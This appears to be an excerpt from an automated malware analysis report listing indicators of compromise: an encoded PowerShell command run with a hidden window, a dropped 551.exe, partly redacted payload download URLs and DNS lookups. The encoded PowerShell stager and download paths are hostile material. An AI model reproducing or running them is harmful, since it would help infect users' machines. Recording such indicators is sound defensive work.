Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAdQBhAHYAagBvAHUAcQB1AGcAbwBpAHAAeABhAHUAZgBkAGkAcgBwAGkAZQBjAD0AJwBnAHUAYQB6AHcAbwB6AG4AZQB1AGQAdgBlAGEAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...
- %HOMEPATH%\551.exe
- %HOMEPATH%\551.exe
- http://www.wa###utv.com/wp-includes/B/
- http://un####ldstudios.com/plugins/x2/
- http://ga###nlogy.com/images/4x2vqro/
- DNS ASK on#####x.martinface.com
- DNS ASK vi###.#artinface.com
- DNS ASK wa###utv.com
- DNS ASK un####ldstudios.com
- DNS ASK ga###nlogy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAdQBhAHYAagBvAHUAcQB1AGcAbwBpAHAAeABhAHUAZgBkAGkAcgBwAGkAZQBjAD0AJwBnAHUAYQB6AHcAbwB6AG4AZQB1AGQAdgBlAGEAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...' (with hidden window)